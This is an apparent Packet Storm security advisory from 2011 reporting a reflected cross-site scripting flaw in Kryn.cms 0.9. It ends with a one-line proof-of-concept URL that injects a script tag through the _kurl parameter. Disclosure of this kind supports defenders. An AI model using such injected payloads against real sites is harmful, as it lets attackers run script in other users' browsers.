Kryn.cms 0.9 Cross Site Scripting

2011-05-24T00:00:00
ID PACKETSTORM:101673
Type packetstorm
Reporter AutoSec Tools
Modified 2011-05-24T00:00:00

Description

                                        
                                            `------------------------------------------------------------------------  
Software................Kryn.cms 0.9  
Vulnerability...........Reflected Cross-site Scripting  
Threat Level............Low (1/5)  
Download................http://www.kryn.org/  
Discovery Date..........5/19/2011  
Tested On...............Windows Vista + XAMPP  
------------------------------------------------------------------------  
Author..................AutoSec Tools  
Site....................http://www.autosectools.com/  
Email...................John Leitch <john@autosectools.com>  
------------------------------------------------------------------------  
  
  
--Description--  
  
A reflected cross-site scripting vulnerability in Kryn.cms 0.9 can be  
exploited to execute arbitrary JavaScript.  
  
  
--PoC--  
  
http://localhost/kyrn/index.php?_kurl=%3Cscript%3Ealert%280%29%3C/script%3E  
`